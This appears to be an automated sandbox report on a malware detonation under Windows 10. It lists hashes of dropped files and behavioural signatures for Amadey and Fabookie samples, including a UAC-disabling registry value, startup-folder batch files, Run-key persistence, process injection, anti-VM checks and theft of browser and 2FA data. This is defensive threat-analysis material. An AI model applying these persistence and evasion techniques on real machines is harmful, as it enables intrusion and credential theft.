SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 0e41e2cb3d12d3d11fead4adadb1afff
SHA1 efabb4fbe215e4369f7ecfb5cfe8cfc035673eeb
SHA256 0ef5b326e5b0df9a0761c752d5bb701ee15f729c1ec421ce0875146d5986864f
SHA512 68ae007b8f0ca711ebead16b95234124433c9c701f1c7559ad07dec74f4eacc5e455850669c7b43b4ce2bc06b79c7235aece7462619514a3b41251390e5d35ae

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 983ceeda4987d343c954e1c4abafdade
SHA1 4d4d170389ef4f13cb42023054f46a081ee99c05
SHA256 5a008e66b9b34b82411d4faec5a51c5e09a55be093f710bab17c79b9347c9f0e
SHA512 391663c5fe024c569b203ef4536ba1e8e8dbee8b7932bb02a535f8a5be2cb142af29a249ca2dbaad6437188475951129e32fde165d968797298c4eaa74354660

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 326cfc6d6322456e4cb75c12f07ef0dc
SHA1 77e8da0a36fe31bdd9511c6eca28179a0d21e3b3
SHA256 9795b94d36f3bfbf3d5734ddb97a19d7d81c9557893a23e4b3f6e6c96eab9c14
SHA512 98dbb0f293952b4deafb567dee851996f9d733f7053f5d52c1a8c9b27cebfbdab26c30bdabaaf6ac90478c5c934eecea1c82c96c64926c67514efeb8920f8635

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 03fce9f9f1f71414a2f7fcb58c11ad12
SHA1 01b58e456bab4218622668ff012259121cbec397
SHA256 a46aa59ab600d2e466cb78eeeb5f21bbb01940d244fbda17c71e9d130fcf9edf
SHA512 62588cf45cd9937f0062a27a5dc2e77379523f982260be03f6a5aaa4c95447323070930672c105f85e4b4b5d457dbf40f21288caec4e6a2a14eb5e4fcebd4b36

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D205WY6X\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-05 04:48

Reported

2023-10-05 04:53

Platform

win10-20230915-en

Max time kernel

181s

Max time network

305s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kMyTHIXX9IsLIhd9nTRBhW9T.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ED6iw01zjT9mZNpiF0IErx2j.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rPYRIpDJeFyy3Gh2kzdsZ4M1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dTAtwU2Ba7N7DkePu4SLIsss.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2jgXfM53lT5ibXuobqmMxjq9.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CZtoCkFy7jZsxKpnEZWzyOTz.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Duks5qtDs20nfLj826B5APxA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kPVubpaCWpcPIxFGVhVvxfFT.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2kVIDdlF84I8Ga4nEIvqUVF9.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GEPeBUrB62frAFUpnOZEClPe.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aN0Qs8OBgsXaAaVeKRc42Zlm.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\j9Vf7RaBlNhysZZ5x87pZ4vr.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DVUp4UlxG3psoyhjnXrUorS5.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe N/A
N/A N/A C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe N/A
N/A N/A C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe N/A
N/A N/A C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe N/A
N/A N/A C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe N/A
N/A N/A C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
N/A N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NOULQ.tmp\TUSMX21oo8cNdNBsovMfwZt9.tmp N/A
N/A N/A C:\Users\Admin\Pictures\0YQWaRmoOozYpx6E5N1eJwqY.exe N/A
N/A N/A C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
N/A N/A C:\Users\Admin\Pictures\P9d600cTodNEw5L3522pm2me.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CL0AP.tmp\_isetup\_setup64.tmp N/A
N/A N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
N/A N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\da-969f5-489-bcd95-8e61c4329d231\Dyfaebedady.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
N/A N/A C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId=" C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Vysihicezhu.exe\"" C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 524 set thread context of 3636 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 524 set thread context of 4896 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe
PID 3464 set thread context of 932 N/A C:\Users\Admin\AppData\Local\Temp\4367208060.exe C:\Windows\syswow64\rundll32.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LightCleaner\is-G0JRC.tmp C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-DOEUN.tmp C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe N/A N/A
File created C:\Program Files\Windows Defender Advanced Threat Protection\NPZREDLAVA\lightcleaner.exe.config C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\Vysihicezhu.exe.config C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-4VQKP.tmp C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-VU1Q7.tmp C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\Vysihicezhu.exe C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe N/A
File created C:\Program Files\Windows Defender Advanced Threat Protection\NPZREDLAVA\lightcleaner.exe C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-5QUC5.tmp C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status C:\Windows\syswow64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\syswow64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Users\Admin\AppData\Local\Temp\4367208060.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\syswow64\rundll32.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
